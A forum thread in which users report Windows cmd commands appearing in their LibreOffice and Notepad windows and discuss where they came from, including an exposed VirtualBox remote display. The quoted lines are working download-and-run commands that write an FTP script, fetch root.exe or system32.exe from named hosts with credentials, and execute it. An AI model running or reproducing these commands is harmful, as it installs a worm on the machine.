Windows Virus on Linux?

I am on Ubuntu 12.04 and using LO 3.5.4

I woke up this morning to find this displayed on my PC in a LO write file:

2011-12 Governor 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit
echo You got owned

cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit
echo You got owned

cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit
echo You got owned

cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit
echo You got owned

cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit
echo You got owned

cmd /c echo open countx6.servegame.com 21 >> ik &echo user nobody lampp >> ik &echo binary >> ik &echo get system32.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &system32.exe &exit
echo Windows has been updated.

Parts of this kept appearing in strange places on documents I was working on yesterday…I recognise some of it.

It is obviously some kind of Windows virus and is interfering with LO…

a) where does it hide
b) how can I eliminate it
c) how can I ensure it does not get passed on to Windows users?

The domain seems to be alizametal.com.tr, ( Trinidad I think )calling a websearch for root.exe … I think it might be possible to pass on the file if it was to embed itself as a macro in LO.
I found the following sites helpful:
http://www.threatexpert.com/files/root.exe.html
http://www.processlibrary.com/directory/files/root/21574/#.UEbeooqPXTY
Now back to your original question, windows executables don’t run in Ubuntu Linux. Unless there is something like wine available. But as long as you’re not @root or su I think there is no issue. Did you login to Ubuntu forums for an answer there ? They have a free web based IRC where you can get lots of further input & experience.

I hope this helps

Dunbrokin: I woke up to almost the same thing today. I have an Ubuntu 12.04.1 fully updated Linux server (just updated yesterday) with the latest version of Virtualbox running Windows 7 (also fully updated). Windows 7 was running at the time.

Today, when I used remote desktop protocol to get on to my Windows 7 VM, I saw notepad was opened, with the following text:

cmd /c echo open countx6.servegame.com 21 >> ik &echo user nobody lampp >> ik &echo binary >> ik &echo get system32.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &system32.exe &exit echo Windows has been updated.

Needless to say, it scared the crap out of me. Who was on my system, and what were they trying to do? After inspecting everything, I realized that I had enabled the remote display in VirtualBox for my Windows 7 VM. VirtualBox does not use a password for the RDP service. I also noticed that the vino-server in Ubuntu had used uPnP to open port 5900 on my router. I figure this is how they got in.

I’m still not sure how the notepad was opened and if anyone was actually on my system or if it was just a script kiddie, but I turned off uPnP, disabled the remote desktop, and scanned the system for malware. Nothing was found.

Does anyone know how a remote attacker can open Notepad (or LibreOffice apparently) without being on the machine? I know a carefully crafted URL can accomplish the task, but how did our computers visit such a URL?

I was curios, so I ftp’d to countx6.servegame.com and downloaded system32.exe. It’s signature from MS Security Essentials was Worm:Win32/Nayrabot.gen!A.

Scary stuff…